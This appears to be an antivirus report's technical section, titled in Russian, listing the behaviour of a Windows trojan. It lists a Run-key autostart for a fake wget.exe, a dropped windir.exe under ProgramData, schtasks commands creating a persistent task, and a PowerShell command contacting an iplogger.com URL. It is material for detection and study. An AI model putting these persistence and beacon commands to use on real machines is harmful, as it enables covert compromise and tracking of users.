Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'wget' = '%HOMEPATH%\My Documents\wget.exe -boot'
- <SYSTEM32>\svchost.exe
- C:\ProgramData\WindowsTask\windir.exe
- %HOMEPATH%\My Documents\wget.exe
- 'C:\ProgramData\WindowsTask\windir.exe'
- '%HOMEPATH%\My Documents\wget.exe'
- '<SYSTEM32>\schtasks.exe' /create /tn MyApp /tr C:\ProgramData\WindowsTask\windir.exe /ri 1 /st 00:00 /du 9999:59 /sc daily /f
- '<SYSTEM32>\cmd.exe' /C powershell $page = (New-Object System.Net.WebClient).DownloadString('https://iplogger.com/1RQ9V6')
- '<SYSTEM32>\cmd.exe' /C md C:\ProgramData\WindowsTask
- '<SYSTEM32>\svchost.exe'
- '<SYSTEM32>\cmd.exe' /C schtasks /create /tn MyApp /tr C:\ProgramData\WindowsTask\windir.exe /ri 1 /st 00:00 /du 9999:59 /sc daily /f